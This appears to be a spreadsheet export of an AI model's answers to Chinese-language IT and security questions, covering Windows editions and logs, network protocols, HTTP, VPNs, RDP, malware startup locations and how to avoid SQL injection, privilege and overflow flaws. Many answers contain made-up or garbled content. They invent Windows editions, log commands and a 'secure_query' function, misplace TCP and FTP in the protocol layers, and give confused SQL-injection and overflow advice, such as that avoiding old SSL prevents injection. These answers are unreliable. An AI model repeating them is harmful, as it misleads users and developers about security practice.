	* Creators Update 增强了 Windows 10 的安全功能，添加了一些新的安全功能，如 Windows Defender Exploit Guard 和 Windows Defender Application Control。
	* Anniversary Update 添加了一些新的安全功能，如 Windows Defender Credential Guard，以及一些改进的安全功能，如 Windows Hello 2.0 和 Windows Defender SmartScreen 的改进。
3. Home Edition with Media Center vs. Home Edition without Media Center:
	* Home Edition with Media Center 具有一些基本的安全功能，如 Windows Defender 和 Windows Firewall，但它没有 BitLocker 和 WDATP。
	* Home Edition without Media Center 具有较多的安全功能，如 BitLocker 和 WDATP，以及一些其他的安全功能，如 Windows Defender Exploit Guard 和 Windows Defender Application Control。
4. Pro for Workstations vs. Pro for Small Business:
	* Pro for Workstations 具有较多的安全功能和企业级特性，如 BitLocker 和 WDATP，以及许多其他的安全功能，如 Windows Defender Exploit Guard 和 Windows Defender Application Control。
	* Pro for Small Business 具有一些基本的安全功能，如 Windows Defender 和 Windows Firewall，但没有 BitLocker 和 WDATP。
总之，Home Edition 和 Pro Edition 都具有一些安全功能，但 Pro Edition 具有更多的安全功能和企业级特性。Creators Update 和 Anniversary Update 都增强了 Windows 10 的安全功能，但Home Edition with Media Center 没有 BitLocker 和 WDATP。Pro for Workstations 和 Pro for Small Business 具有更多的安全功能和企业级特性。
因此，如果您是一个个人用户，您可以考虑使用 Home Edition 或 Pro Edition，具体选择哪一个具体取决于您的需求和预算。如果您是一个企业用户，您可以考虑使用 Enterprise Edition 或 Pro for Workstations，以便获得更多的安全功能和企业级特性。</t>
        </is>
      </c>
      <c r="D103" t="n">
        <v>24.47005033493042</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="1" t="n">
        <v>102</v>
      </c>
      <c r="B104" t="inlineStr">
        <is>
          <t>如何查看Windows系统的日志</t>
        </is>
      </c>
      <c r="C104" t="inlineStr">
        <is>
          <t>在Windows系统中，日志可以提供有关系统和应用程序的操作记录，帮助您诊断和 Debug 问题。下面是一些查看Windows系统日志的方法：
1. Event Viewer
Event Viewer 是 Windows 的一个标准工具，可以用来查看系统日志。您可以通过以下方式打开 Event Viewer：
* 输入“eventvwr”在开始菜单中并press Enter。
* 在“事件浏览器”中，选择“Windows Logs”选项卡，然后选择您想要查看的日志。
2. System Configuration
System Configuration 是 Windows 的一个工具，可以用来查看系统日志。您可以通过以下方式打开 System Configuration：
* 输入“msconfig”在开始菜单中并press Enter。
* 在“系统 configuration”中，选择“日志”选项卡，然后选择您想要查看的日志。
3. Command Prompt
您可以使用 Command Prompt 来查看系统日志。下面是一些命令可以用来查看日志：
* `lograw`: 显示系统日志的raw数据。
* `logtail`: 显示系统日志的tail数据。
* `loglist`: 显示系统日志的列表。
例如，您可以使用以下命令来查看系统日志：
`lograw c:\windows\system32\config\system`
4. third-party tools
如果您想要更多的功能来查看日志，您可以使用第三方工具。例如，您可以使用 Logparser 来查看系统日志。Logparser 是一个可以用来查看和分析系统日志的工具，可以在以下方式下载：
* [Logparser](https://www.microsoft.com/download/details.aspx?id=24671)
您可以使用以下命令来查看系统日志：
`logparser c:\windows\system32\config\system`
5. Windows 10 中的查看日志
在 Windows 10 中，您可以使用“查看日志”工具来查看系统日志。您可以通过以下方式打开“查看日志”：
* 输入“eventvwr”在开始菜单中并press Enter。
* 在“事件浏览器”中，选择“Windows 10 日志”选项卡，然后选择您想要查看的日志。
这些方法可以帮助您查看Windows系统的日志，帮助您诊断和 Debug 问题。</t>
        </is>
      </c>
      <c r="D104" t="n">
        <v>20.28799748420715</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="1" t="n">
        <v>103</v>
      </c>
      <c r="B105" t="inlineStr">
        <is>
          <t>如何查看Windows系统的IP</t>
        </is>
      </c>
      <c r="C105" t="inlineStr">
        <is>
          <t>地址？
Windows系统中可以使用多种方法来查看系统的IP地址，下面列举一些常见的方法：
1. 在“开始”菜单中选择“控制面板”，然后在“网络和 Internet”选项卡中查看“ip4 地址”和“ip6 地址”两个表格。
2. 在“开始”菜单中选择“系统和安全”，然后在“系统”选项卡中查看“系统设置”下的“网络”选项，它将显示系统的IP地址和网络配置。
3. 使用命令行工具，可以使用“ipconfig”命令来查看系统的IP地址，例如：
ipconfig /all
这将显示系统的所有网络配置，包括IP地址、网络名称等。
4. 使用网络卡控制程序，可以使用网络卡控制程序来查看系统的IP地址，例如：
以下是一些常用的网络卡控制程序：
* Windows 10：网络和电话设置
* Windows 8：控制面板中的网络和Internet选项卡
* Windows 7：网络和电话设置
这些程序将显示系统的网络配置，包括IP地址、网络名称等。
5. 使用 third-party 工具，例如：
* TcpView：可以查看系统的所有网络连接，包括IP地址、网络名称等。
* NetStat：可以查看系统的当前网络连接和缓存，包括IP地址、网络名称等。
这些工具将显示系统的网络配置和连接状况。
需要注意的是，Windows系统中的IP地址可能会变化，因此需要定期查看系统的IP地址以保持最新的配置。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D105" t="n">
        <v>15.16547989845276</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="1" t="n">
        <v>104</v>
      </c>
      <c r="B106" t="inlineStr">
        <is>
          <t>Windows系统可以作为服务器系统吗</t>
        </is>
      </c>
      <c r="C106" t="inlineStr">
        <is>
          <t>Yes, Windows can be used as a server system. Windows Server is a version of the Windows operating system that is specifically designed for use as a server, providing a range of features and tools for managing and hosting networks, applications, and other resources.
Some of the key features of Windows Server include:
1. Networking: Windows Server provides a range of networking features, including support for DNS, DHCP, and remote access, as well as tools for managing and monitoring network activity.
2. Security: Windows Server includes a range of security features, such as user authentication, access control, and encryption, to help protect your network and data from unauthorized access.
3. Storage: Windows Server provides a range of storage features, including support for file sharing, shared disks, and volume shadow copy, as well as tools for managing and monitoring storage activity.
4. Virtualization: Windows Server provides support for virtualization, allowing you to create and manage virtual machines (VMs) and run multiple operating systems on a single physical server.
5. Application management: Windows Server provides tools for managing and hosting applications, including support for ASP.NET and other web-based applications, as well as tools for managing and monitoring application activity.
6. Remote access: Windows Server provides tools for remote access to your network and resources, including support for remote desktop connections and other remote access technologies.
7. Automation: Windows Server provides tools for automating tasks and processes, including support for Windows PowerShell and other automation tools.
8. High availability: Windows Server provides features for ensuring high availability of your network and resources, including support for failover clustering and other high availability technologies.
9. Scalability: Windows Server provides support for scaling your network and resources to meet the needs of your growing business, including support for multi-processor systems and other scalable technologies.
Overall, Windows Server provides a comprehensive set of features and tools for managing and hosting networks, applications, and other resources, making it a popular choice for server systems.</t>
        </is>
      </c>
      <c r="D106" t="n">
        <v>11.26994776725769</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="1" t="n">
        <v>105</v>
      </c>
      <c r="B107" t="inlineStr">
        <is>
          <t>Windows 9是什么系统</t>
        </is>
      </c>
      <c r="C107" t="inlineStr">
        <is>
          <t>Windows 9是什么系统？ 
Windows 9是一个受到评论和猜想的操作系统，它的存在和特性在微软公司内部进行了广泛的评论和猜想。
Windows 9的概念是在2014年由一位名做Jeffrey Schwartz在一篇名为“Will There Be a Windows 9?”的文章中提出的，他在文章中表示，微软可能会在未来推出一个新的操作系统，它可能会具有类似于Windows 8的功能，但同时具有更多的改进和优化。
尽管Windows 9的存在没有得到官方证实，但根据一些受到透赏的消息，这个系统可能会具有以下特性：
1. 改进的用户界面：Windows 9可能会具有一个更加人性化的用户界面，可以更好地适应不同的设备和屏幕尺寸。
2. 更多的优化：Windows 9可能会具有更多的优化，以提高系统的稳定性、速度和安全性。
3. 新的功能：Windows 9可能会具有一些新的功能，例如，可能会包含一个新的桌面浏览器，可以在多个桌面之间进行浏览。
4. 支持更多的设备：Windows 9可能会支持更多的设备，例如，智能手机、平板电脑和其他类型的设备。
需要注意的是，这些特性都是基于听说和猜想的，它们没有得到官方证实。在actualizaciones系统中，微软可能会采取不同的路线，以满足用户的需求和期望。</t>
        </is>
      </c>
      <c r="D107" t="n">
        <v>15.18581390380859</v>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="1" t="n">
        <v>106</v>
      </c>
      <c r="B108" t="inlineStr">
        <is>
          <t>木马病毒通常在Windows系统中哪些地方创建启动项</t>
        </is>
      </c>
      <c r="C108" t="inlineStr">
        <is>
          <t>Answer:
Malware, including viruses, can create startup items in various locations on a Windows system. Here are some common locations where malware may create startup items:
1. **Startup folder**: The Startup folder is located in the "C:\ProgramData\Microsoft\Windows\Startup" directory. This folder contains a list of programs that are launched automatically when the system boots up. Malware may create a new entry in this folder to start itself when the system boots.
2. **Task Scheduler**: The Task Scheduler is a built-in Windows tool that allows you to schedule tasks to run at specific times or events. Malware may create a new task in the Task Scheduler to start itself automatically.
3. **Windows Registry**: The Windows Registry is a database that stores configuration settings and options for the Windows operating system and installed applications. Malware may create new registry keys or modify existing ones to start itself automatically when the system boots.
4. **AutoRun**: The AutoRun feature in Windows allows applications to run automatically when a removable drive is inserted or when the system boots. Malware may use this feature to start itself when the system boots.
5. **Boot.ini**: The Boot.ini file is located in the "C:\Windows\Boot.ini" directory. This file contains a list of programs that are loaded during the boot process. Malware may modify this file to include itself as a boot item.
It's important to note that these locations are not the only places where malware may create startup items. Malware can also create startup items in other locations, such as the "C:\Users\UserName\AppData\Roaming\Microsoft\Windows\Startup" directory or the "C:\ProgramData\Microsoft\Windows\Startup" directory.
To protect your system from malware, it's essential to regularly scan your system for malware using a reputable antivirus program and to be cautious when opening email attachments or clicking on links from unknown sources.</t>
        </is>
      </c>
      <c r="D108" t="n">
        <v>11.35510063171387</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="1" t="n">
        <v>107</v>
      </c>
      <c r="B109" t="inlineStr">
        <is>
          <t>TCP和UDP有什么区别</t>
        </is>
      </c>
      <c r="C109" t="inlineStr">
        <is>
          <t>TCP和UDP是两种常用的网络协议，它们的主要区别在于：
1. 确认包接收：TCP 是一种可靠的协议，它会对数据包进行确认接收，如果不能接收到确认包，则会返回错误。而 UDP 是一种非可靠的协议，它不会对数据包进行确认接收，因此不会返回错误。
2. 粘包：TCP 会将数据包粘包到一个字节单元中，以确保数据的完整性和正确性。而 UDP 不会粘包数据，因此可能会出现数据损失或不完整的情况。
3. 可靠性：TCP 具有高度的可靠性，它会对数据包进行确认接收和粘包，以确保数据的完整性和正确性。而 UDP 具有较低的可靠性，它不会对数据包进行确认接收或粘包，因此可能会出现数据损失或不完整的情况。
4. 协议层：TCP 位于 TCP/IP 协议层之上，而 UDP 位于 UDP/IP 协议层之上。
5. 应用层：TCP 是一种应用层协议，它主要用于实现 TCP  Socket 的连接，而 UDP 是一种传输层协议，它主要用于实现 UDP  socket 的连接。
6. 缓冲区：TCP 会在缓冲区中存储数据包，以确保数据的完整性和正确性。而 UDP 不会缓冲数据包，因此可能会出现数据损失或不完整的情况。
7. 检查SUM：TCP 会在数据包的末尾添加检查SUM，以验证数据的完整性。而 UDP 不会添加检查SUM。
8. 协议选择：TCP 是一种可选协议，它可以与其他协议（如 UDP）同时使用。而 UDP 是一种强制性协议，它不能与其他协议同时使用。
总之，TCP 和 UDP 具有不同的设计理念和功能，TCP 适用于需要高度可靠性和数据完整性的应用，例如 FTP、Telnet 等，而 UDP 适用于需要高速传输和低延迟的应用，例如 DNS、DHCP 等。</t>
        </is>
      </c>
      <c r="D109" t="n">
        <v>21.93317604064941</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="1" t="n">
        <v>108</v>
      </c>
      <c r="B110" t="inlineStr">
        <is>
          <t>FTP属于TCP/IP模型中的哪一层</t>
        </is>
      </c>
      <c r="C110" t="inlineStr">
        <is>
          <t>FTP是一种文件传输协议，属于TCP/IP模型中的应用层。具体来说，FTP的层次结构如下：
1. 应用层：FTP客户端和服务器端之间的交互都是基于应用层协议的。在这个层次结构中，FTP是一种应用层协议，用于文件传输。
2. 网络层：FTP客户端和服务器端之间的数据传输都是基于网络层协议的。在这个层次结构中，FTP使用 TCP 协议来确保数据的可靠性和可靠性。
3. 数据链层：FTP客户端和服务器端之间的数据传输都是基于数据链层协议的。在这个层次结构中，FTP使用 IP 协议来确定数据的路由和传输。
因此，FTP属于TCP/IP模型中的应用层。</t>
        </is>
      </c>
      <c r="D110" t="n">
        <v>8.729980945587158</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="1" t="n">
        <v>109</v>
      </c>
      <c r="B111" t="inlineStr">
        <is>
          <t>DNS是明文的还是加密的</t>
        </is>
      </c>
      <c r="C111" t="inlineStr">
        <is>
          <t>DNS是一种明文的域名系统，它用于将 компьюте中的域名识别到其相对应的 IP 地址。DNS 使得 компьютер可以访问互联网和其他网络资源，无需记住 IP 地址。
DNS 不是加密的。它是一种明文的数据交换协议，它使用 plain text 的数据 Format 来传输域名和 IP 地址。这意味着，如果攻击者拥有一个 DNS 解析器，他可以可以查看到你的域名和 IP 地址。因此，在使用 DNS 时，需要特别注意隐私和安全问题。
在实际应用中，DNS 通常使用加密技术来保护域名和 IP 地址的隐私。例如，DNS over HTTPS (DoH) 是一种新的 DNS 协议，它使用 HTTPS 协议来加密 DNS 数据，以保护用户的隐私。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D111" t="n">
        <v>8.6222083568573</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="1" t="n">
        <v>110</v>
      </c>
      <c r="B112" t="inlineStr">
        <is>
          <t>HTTP请求头有哪些字段</t>
        </is>
      </c>
      <c r="C112" t="inlineStr">
        <is>
          <t>HTTP请求头的字段分为两类：
1. 必需字段：包括请求方法、URL、通信方式、版本等。
2. 可选字段：包括用户数据、响应的状态等。
以下是HTTP请求头的常见字段：
1. 必需字段：
	* `Method`: 请求方法（GET、POST、PUT、DELETE等）
	* `Url`: 请求的URL
	* `Host`: 主机名
	* `User-Agent`: 用户代理（浏览器或客户端）
	* `Accept`: 响应的格式（HTML、JSON等）
	* `Accept-Language`: 语言地区
	* `Accept-Encoding`: 编解码方式
	* `Content-Type`: 请求体类型
2. 可选字段：
	* `Authorization`: 身份验证信息（ auth token、cookies 等）
	* `Cookie`: Cookie信息
	* `Content-Length`: 请求体长度
	* `Connection`: 连接方式（keep-alive、close等）
	* `Host`: 主机名
	* `Proxy-Authorization`: 代理身份验证信息
	* `Range`: 范围（用于分割大文件）
	* `If-Modified-Since`: 如果文件修改后，则返回响应
	* `If-None-Match`: 如果文件不 modified，则返回响应
	* `If-Unmodified-Since`: 如果文件不 modified，则返回响应
这些字段的值可以根据需要进行设置和修改。通常情况下，您只需要关注必需字段，即方法、URL、Host 等。可选字段的设置取决于您的需求和使用场景。</t>
        </is>
      </c>
      <c r="D112" t="n">
        <v>13.45825004577637</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="1" t="n">
        <v>111</v>
      </c>
      <c r="B113" t="inlineStr">
        <is>
          <t>HTTP响应码有哪些？分表是什么含义</t>
        </is>
      </c>
      <c r="C113" t="inlineStr">
        <is>
          <t>HTTP响应码有很多种，这些响应码的含义和用途都不同。下面是常见的HTTP响应码：
1xx Informational: 100 Continue, 101 Switching Protocols
* 100 Continue: 客户端发送请求 Header 的 Complete 标识符，服务器必须在响应 headers 中返回一个 complete 标识符。
* 101 Switching Protocols: 服务器响应，用于指示客户端应用另一种协议（例如，响应于 HTTP/1.0 请求，服务器将应用 HTTP/1.1）。
2xx Success: 200 OK, 201 Created, 204 No Content, 205 Reset Content
* 200 OK: 服务器成功处理请求，并返回响应数据。
* 201 Created: 服务器成功创建了新资源，并返回响应数据。
* 204 No Content: 服务器成功处理请求，但无法返回响应数据。
* 205 Reset Content: 服务器重置了响应数据，以便在下一次请求时重新发送。
3xx Redirection: 300 Multiple Choices, 301 Moved Permanently, 302 Found, 303 See Other, 304 Not Modified, 305 Use Proxy
* 300 Multiple Choices: 服务器返回一个列表中的多个可能的资源。
* 301 Moved Permanently: 服务器重定向到另一个资源。
* 302 Found: 服务器返回一个资源，但是客户端可以根据Location header选择另一个资源。
* 303 See Other: 服务器返回一个资源，但是客户端可以根据Location header选择另一个资源。
* 304 Not Modified: 服务器返回一个资源，以确保客户端知道资源没有发生修改。
* 305 Use Proxy: 服务器返回一个资源，但是客户端应使用代理服务器来访问。
4xx Client errors: 400 Bad Request, 401 Unauthorized, 402 Payment Required, 403 Forbidden, 404 Not Found, 405 Method Not Allowed
* 400 Bad Request: 客户端发送的请求无法被解析或验证。
* 401 Unauthorized: 客户端未提供正确的身份验证信息。
* 402 Payment Required: 客户端未提供支付信息。
* 403 Forbidden: 客户端尝试访问禁止的资源或方法。
* 404 Not Found: 客户端尝试访问不存在的资源。
* 405 Method Not Allowed: 客户端发送的请求方法不允许。
5xx Server errors: 500 Internal Server Error, 502 Bad Gateway, 503 Service Unavailable, 504 Gateway Timeout, 505 HTTP Version Not Supported
* 500 Internal Server Error: 服务器遇到了内部错误，无法处理请求。
* 502 Bad Gateway: 服务器在响应数据时遇到了问题，并且无法重定向客户端。
* 503 Service Unavailable: 服务器当前无法处理请求，但是将在将来尝试处理请求。
* 504 Gateway Timeout: 服务器处理请求时间超时。
* 505 HTTP Version Not Supported: 客户端使用的HTTP协议不被服务器支持。
需要注意的是，这些响应码只是HTTP协议中规定的一些常见响应码，实际情况中可能会有更多的响应码。 additionally，服务器可以返回其他的响应码以指示更多的情况，例如，401 Unauthorized 和 403 Forbidden 可以用于指示访问权限不够，而不是客户端发送的请求无法被解析或验证。</t>
        </is>
      </c>
      <c r="D113" t="n">
        <v>34.4726665019989</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="1" t="n">
        <v>112</v>
      </c>
      <c r="B114" t="inlineStr">
        <is>
          <t>什么是HTTPS</t>
        </is>
      </c>
      <c r="C114" t="inlineStr">
        <is>
          <t>HTTPS是Hypertext Transfer Protocol Secure的缩写，是一种安全的网络通信协议。它使用SSL/TLS协议加密数据，从而保护用户隐私和数据安全。
HTTPS通常用于在互联网上进行安全的通信，如在线银行、电子商务、访问敏感数据等场景。它可以使用HTTP代理服务器或Direct Connection模式来实现安全的通信。
HTTPS的主要特点包括：
1. 加密：使用SSL/TLS协议加密数据，防止恶意攻击者 intercept 和窃走数据。
2. 身份验证：使用证书身份验证，确保通信方的身份是正确的。
3. 权利验证：使用证书权利验证，确保通信方有权访问敏感数据。
4. 数据integrity：使用SSL/TLS协议保证数据的完整性和一致性。
总之，HTTPS可以保护用户隐私和数据安全，并且提供一个安全的网络通信环境。</t>
        </is>
      </c>
      <c r="D114" t="n">
        <v>10.64702773094177</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="1" t="n">
        <v>113</v>
      </c>
      <c r="B115" t="inlineStr">
        <is>
          <t>有哪些VPN协议</t>
        </is>
      </c>
      <c r="C115" t="inlineStr">
        <is>
          <t>VPN（虚拟专用网络）是一种技术，允许用户通过互联网连接到一个虚拟网络，从而保护他们的私隐和安全。VPN协议是指在VPN连接中使用的协议或标准。以下是常见的VPN协议：
1. OpenVPN：OpenVPN是一种开源的VPN协议，它使用TCP/UDP协议和AES加密方式来保护数据。OpenVPN支持多种端口和协议，可以在多种设备和操作系统上运行。
2. PPTP（Point-to-Point Tunneling Protocol）：PPTP是一种常见的VPN协议，它使用GRE协议和MPPE加密方式来保护数据。PPTP支持多种端口和协议，可以在多种设备和操作系统上运行。
3. L2TP/IPSec：L2TP/IPSec是一种VPN协议，它使用L2TP协议和IPSec加密方式来保护数据。L2TP/IPSec支持多种端口和协议，可以在多种设备和操作系统上运行。
4. IKEv2（Internet Key Exchange, version 2）：IKEv2是一种VPN协议，它使用Symmetric key encryption和Asymmetric key encryption来保护数据。IKEv2支持多种端口和协议，可以在多种设备和操作系统上运行。
5. SSH（Secure Shell）：SSH是一种Secure Sockets Layer协议，它使用 symmetric key encryption和public key encryption来保护数据。SSH支持多种端口和协议，可以在多种设备和操作系统上运行。
6. SSL/TLS（Secure Sockets Layer/Transport Layer Security）：SSL/TLS是一种加密协议，它使用 symmetric key encryption和public key encryption来保护数据。SSL/TLS支持多种端口和协议，可以在多种设备和操作系统上运行。
7. WireGuard：WireGuard是一种轻量级的VPN协议，它使用stateful cryptography和fast handshake来保护数据。WireGuard支持多种端口和协议，可以在多种设备和操作系统上运行。
8. SoftEther VPN：SoftEther VPN是一种高速VPN协议，它使用Stealth encapsulation和VPN Acceleration来保护数据。SoftEther VPN支持多种端口和协议，可以在多种设备和操作系统上运行。
这些VPN协议都有其优缺点和应用场景，选择合适的VPN协议取决于你的需求和环境。</t>
        </is>
      </c>
      <c r="D115" t="n">
        <v>24.14482736587524</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="1" t="n">
        <v>114</v>
      </c>
      <c r="B116" t="inlineStr">
        <is>
          <t>Shadowsocks是什么</t>
        </is>
      </c>
      <c r="C116" t="inlineStr">
        <is>
          <t>Shadowsocks是一个开源的跨平台、协议和技术的跨网络安全解决方案，它通过使用加密、混合、跨域、跨端和跨网络等技术来保护用户的隐私和安全。Shadowsocks的核心技术包括Shadowsocks-R虚拟网络通信协议、Shadowsocks-X虚拟网络协议、Shadowsocks-C虚拟网络协议等，这些协议可以将用户的网络流量 encrypt、匿名化和跨网络传输。
Shadowsocks的主要特点包括：
1. 跨平台支持：Shadowsocks可以在多种操作系统和设备上进行安装和使用，包括Windows、Mac、Linux、Android等。
2. 跨网络支持：Shadowsocks可以在多种网络环境中进行使用，包括互联网、内网、虚拟专用网络等。
3. 加密技术：Shadowsocks使用的加密算法包括AES-256、ChaCha20等，可以为用户的数据带来高度的安全保障。
4. 混合技术：Shadowsocks可以通过使用多种技术来实现匿名和隐蔽，包括VPN、SOCKS、Tor等。
5. 跨域技术：Shadowsocks可以使用多种跨域技术来实现跨域传输，包括Shadowsocks-R、Shadowsocks-X、Shadowsocks-C等。
6. 可扩展性：Shadowsocks可以根据需要进行扩展和拓展，可以将其与其他软件或技术集成。
总之，Shadowsocks是一个功能强大、可靠的跨平台、跨网络安全解决方案，可以帮助用户在多种网络环境中保护自己的隐私和安全。</t>
        </is>
      </c>
      <c r="D116" t="n">
        <v>18.06136584281921</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="1" t="n">
        <v>115</v>
      </c>
      <c r="B117" t="inlineStr">
        <is>
          <t>RDP是什么协议</t>
        </is>
      </c>
      <c r="C117" t="inlineStr">
        <is>
          <t>RDP（Remote Desktop Protocol）是一种协议，允许用户远程访问和控制另一个计算机。它通常用于远程工作、支持和管理等场景。RDP使用 TCP 协议来传输数据，并使用 SSL/TLS 协议来加密数据。RDP可以在多种操作系统上使用，包括 Windows、Linux、Mac 等。
RDP 协议的主要特点包括：
1. 安全性：RDP 使用 SSL/TLS 协议来加密数据，保护远程连接免受攻击。
2. 高效性：RDP 可以使用多个帧重复机制来提高帧的传输速度。
3. 灵活性：RDP 可以在多种操作系统上使用，并且可以在不同的环境中进行远程连接。
4. 可扩展性：RDP 可以通过使用第三方扩展程序来提高其功能。
RDP 协议的使用场景包括：
1. 远程工作：RDP 可以帮助用户远程访问和控制另一个计算机，以实现远程工作。
2. 支持和管理：RDP 可以帮助 IT 人员远程支持和管理多个计算机，以提高生产力和效率。
3. 教育和训练：RDP 可以帮助教育机构远程教学和训练学生，以提高学生的学习效果。
4. 医疗保健：RDP 可以帮助医疗机构远程提供医疗服务，以提高患者的服务质量。
总之，RDP 协议是一种具有安全性、高效性、灵活性和可扩展性的远程连接协议，广泛应用于远程工作、支持和管理、教育和训练、医疗保健等领域。</t>
        </is>
      </c>
      <c r="D117" t="n">
        <v>17.44220185279846</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="1" t="n">
        <v>116</v>
      </c>
      <c r="B118" t="inlineStr">
        <is>
          <t>如何在开发中避免SQL注入漏洞</t>
        </is>
      </c>
      <c r="C118" t="inlineStr">
        <is>
          <t>在开发中， SQL 注入漏洞是一种常见的安全漏洞，它可以让攻击者通过输入特定的查詢语句来执行特定的操作，如查看、更改或删除数据。以下是一些避免 SQL 注入漏洞的方法：
1. 使用 parameterized queries：使用 parameterized queries 可以避免直接嵌入 user input 到查詢语句中，从而避免 SQL 注入漏洞。 Parameterized queries 通过将用户输入存储在扩展名中，然后在查詢语句中使用这些值来替换特定的查詢语句。
2. 使用 prepared statements：prepared statements 是一种类似于 parameterized queries 的方法，它们通常在数据库中使用。 prepared statements 将查詢语句存储在数据库中，然后在应用程序中使用这些语句来执行查詢。
3. 使用 filters：filters 可以帮助避免 SQL 注入漏洞，通过对用户输入进行过滤和检查。 filters 可以在应用程序中使用，例如，在查詢语句中使用 LIKE 函数来过滤输入，或者在数据库中使用 SQL  Filter 来过滤数据。
4. 使用 validation：validation 可以帮助避免 SQL 注入漏洞，通过对用户输入进行验证和检查。 validation 可以在应用程序中使用，例如，使用 PHP 的 filter_var 函数来验证用户输入是否符合要求，或者使用 Java 的 validate 方法来验证用户输入是否符合要求。
5. 使用 encoding：encoding 可以帮助避免 SQL 注入漏洞，通过将用户输入编码为 Unicode 字符串。 encoding 可以在应用程序中使用，例如，使用 PHP 的 addslashes 函数来编码用户输入，或者使用 Java 的 URL Encoder 来编码用户输入。
6. 避免使用Raw SQL：Raw SQL 可以帮助避免 SQL 注入漏洞，通过避免直接使用用户输入到查詢语句中。 Raw SQL 可以在应用程序中使用，例如，使用 PHP 的 query_builder 来创建查詢语句，然后使用这些语句来执行查詢。
7. 使用 secure_query 函数：secure_query 函数可以帮助避免 SQL 注入漏洞，通过对查詢语句进行加密和验证。 secure_query 函数可以在数据库中使用，例如，使用 MySQL 的 secure_query 函数来加密查詢语句，或者使用 Oracle 的 secure_query 函数来加密查詢语句。
8. 避免使用扩展名：扩展名可以帮助避免 SQL 注入漏洞，通过避免直接使用用户输入到查詢语句中。 扩展名可以在应用程序中使用，例如，使用 PHP 的 preg_replace 函数来替换扩展名，或者使用 Java 的 replace 方法来替换扩展名。
9. 使用 two-way encryption：two-way encryption 可以帮助避免 SQL 注入漏洞，通过对用户输入进行加密和验证。 two-way encryption 可以在应用程序中使用，例如，使用 PHP 的 crypt 函数来加密用户输入，然后使用这些加密后的值来执行查詢。
10. 避免使用老式 SSL/TLS：老式 SSL/TLS 可以帮助避免 SQL 注入漏洞，通过使用更高级别的加密方式来 encrypt 查詢语句。 old SSL/TLS 可以在应用程序中使用，例如，使用 PHP 的 openssl_encrypt 函数来加密查詢语句，或者使用 Java 的 SSL 或 TLS 类来加密查詢语句。
总之，避免 SQL 注入漏洞需要总结一些方法和技术，包括使用 parameterized queries、prepared statements、filters、validation、encoding、Raw SQL、secure_query 函数、扩展名、two-way encryption 和 old SSL/TLS。</t>
        </is>
      </c>
      <c r="D118" t="n">
        <v>35.8709888458252</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="1" t="n">
        <v>117</v>
      </c>
      <c r="B119" t="inlineStr">
        <is>
          <t>如何在开发中避免越权漏洞</t>
        </is>
      </c>
      <c r="C119" t="inlineStr">
        <is>
          <t>在开发中，越权漏洞（Grantless vulnerabilities）是指没有被授权的访问或操作可以让攻击者获得敏感数据或权力。这些漏洞可能会导致敏感数据泄露、安全受到攻击，因此在开发中应该采取适当的措施来避免越权漏洞。以下是一些避免越权漏洞的建议：
1. 权限验证：在应用程序中，只授予最小的权限给用户，即使用户拥有某个功能或数据，也应该只授予他们对这些数据的访问权限，而不是授予他们所有的权限。
2. 访问控制：限制访问权限，只允许某些用户或某些功能访问敏感数据或功能。例如，在一个购物网站上，只允许用户购买的数据，而不允许他们访问其他用户的资料。
3. 权限隔离：将敏感数据分隔离在不同的环境中，例如在一个独立的数据库或服务中，以防止攻击者访问敏感数据。
4. 权限划定：在应用程序中，划定权限，例如，只允许某些用户访问敏感数据，而不允许其他用户访问。
5. 验证权限：在应用程序中，验证用户的权限，例如，在一个购物网站上，只允许注册用户购买产品，而不允许未注册用户购买。
6. 权限管理：在应用程序中，定期检查和更新用户的权限，例如，在一个社交媒体平台上，只允许用户访问敏感数据，直到他们的权限更新为有权访问。
7. 敏感数据安全：在应用程序中，将敏感数据存储在安全的数据存储中，例如，在一个加密的数据库中，以防止攻击者访问敏感数据。
8. 安全检查：在应用程序中，定期检查和更新安全检查，例如，在一个网站上，定期检查用户的访问权限，以防止用户访问敏感数据。
总之，避免越权漏洞需要通过不断地对应用程序的权限进行检查和更新，并在需要时增加防御方面的措施。</t>
        </is>
      </c>
      <c r="D119" t="n">
        <v>25.13314199447632</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="1" t="n">
        <v>118</v>
      </c>
      <c r="B120" t="inlineStr">
        <is>
          <t>如何在开发中避免溢出漏洞</t>
        </is>
      </c>
      <c r="C120" t="inlineStr">
        <is>
          <t>在开发中，溢出漏洞是一种常见的安全漏洞，可能会导致数据泄露或程序崩溃。以下是一些有效的方法来避免溢出漏洞在开发中：
1. 使用垃圾回收机制：垃圾回收机制可以帮助开发者避免溢出漏洞。垃圾回收机制可以在内存中自动释放不再引用的内存地址。
2. 使用内存检查：内存检查可以帮助开发者检测溢出漏洞。可以在程序运行时检查内存中的块是否已经释放，并在发现溢出时中止程序的运行。
3. 使用静态内存分析工具：静态内存分析工具可以帮助开发者检测溢出漏洞。这些工具可以在程序编译时检查内存中的块是否已经释放，并提供相应的警告。
4. 避免在不可靠的地方使用动态分配的内存：动态分配的内存可能会导致溢出漏洞。因此，应该避免在不可靠的地方使用动态分配的内存。
5. 使用内存安全框架：内存安全框架可以帮助开发者避免溢出漏洞。这些框架可以在程序运行时检查内存中的块是否已经释放，并提供相应的检测和处理机制。
6. 使用静态分配的内存：静态分配的内存可以帮助避免溢出漏洞。这种方法可以在程序编译时静态分配内存，并在程序运行时强制释放它。
7. 避免使用内存模拟：内存模拟可能会导致溢出漏洞。因此，应该避免在不可靠的地方使用内存模拟。
8. 使用内存锁：内存锁可以帮助避免溢出漏洞。这种方法可以在程序运行时锁定内存块，以防止其被其他线程访问。
